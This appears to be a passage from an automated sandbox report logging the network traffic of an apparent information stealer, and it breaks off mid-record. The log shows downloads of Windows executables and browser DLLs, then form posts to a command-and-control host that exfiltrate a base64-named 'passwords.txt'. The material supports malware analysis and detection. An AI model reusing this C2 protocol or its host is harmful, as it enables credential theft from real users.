Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:31 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:39 GMTContent-Type: application/octet-streamContent-Length: 551424Last-Modified: Tue, 08 Oct 2024 00:39:32 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "67047f44-86a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 89 39 06 79 e8 57 55 79 e8 57 55 79 e8 57 55 aa 9a 54 54 75 e8 57 55 aa 9a 52 54 d2 e8 57 55 aa 9a 53 54 6c e8 57 55 aa 9a 56 54 7a e8 57 55 79 e8 56 55 21 e8 57 55 69 6c 54 54 6d e8 57 55 69 6c 53 54 6b e8 57 55 69 6c 52 54 34 e8 57 55 31 6d 5e 54 78 e8 57 55 31 6d a8 55 78 e8 57 55 31 6d 55 54 78 e8 57 55 52 69 63 68 79 e8 57 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 43 7f 04 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 12 02 00 00 62 06 00 00 00 00 00 52 6f 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 1e f2 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c6 02 00 28 00 00 00 00 80 08 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 d4 1a 00 00 c0 ab 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ab 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 10 02 00 00 10 00 00 00 12 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 9d 00 00 00 30 02 00 00 9e 00 00 00 16 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 a3 05 00 00 d0 02 00 00 96 05 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 03 00 00 00 80 08 00 00 04 00 00 00 4a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 1a 00 00 00 90 08 00 00 1c 00 00 00 4e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /maslengdsa HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: kasm.zubairgul.comContent-Length: 255Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 46 30 30 46 35 44 36 35 43 45 31 36 35 30 34 34 35 35 32 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="hwid"1F00F5D65CE1650445529-a33c7340-61ca------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------KEGIDHJKKJDGCBGCGIJK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="mode"1------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKJEBFIDAEBFHIDAEBHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 2d 2d 0d 0a Data Ascii: ------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="mode"2------FBKKJEBFIDAEBFHIDAEB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: kasm.zubairgul.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="mode"21------DAKEBAKFHCFHIEBFBAFB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: kasm.zubairgul.comContent-Length: 5965Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: kasm.zubairgul.comContent-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: kasm.zubairgul.comContent-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: kasm.zubairgul.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 2d 2d 0d 0a Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="file_data"------CAAKKFHCFIECAAAKEGCF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: kasm.zubairgul.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_data"------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: kasm.zubairgul.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="mode"3------EGCBAFCFIJJJECBGIIJK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="mode"4------JDAFHCGIJECFHIDGDBKE--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJKJDBFIIDHJKEHJEHHost: kasm.zubairgul.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 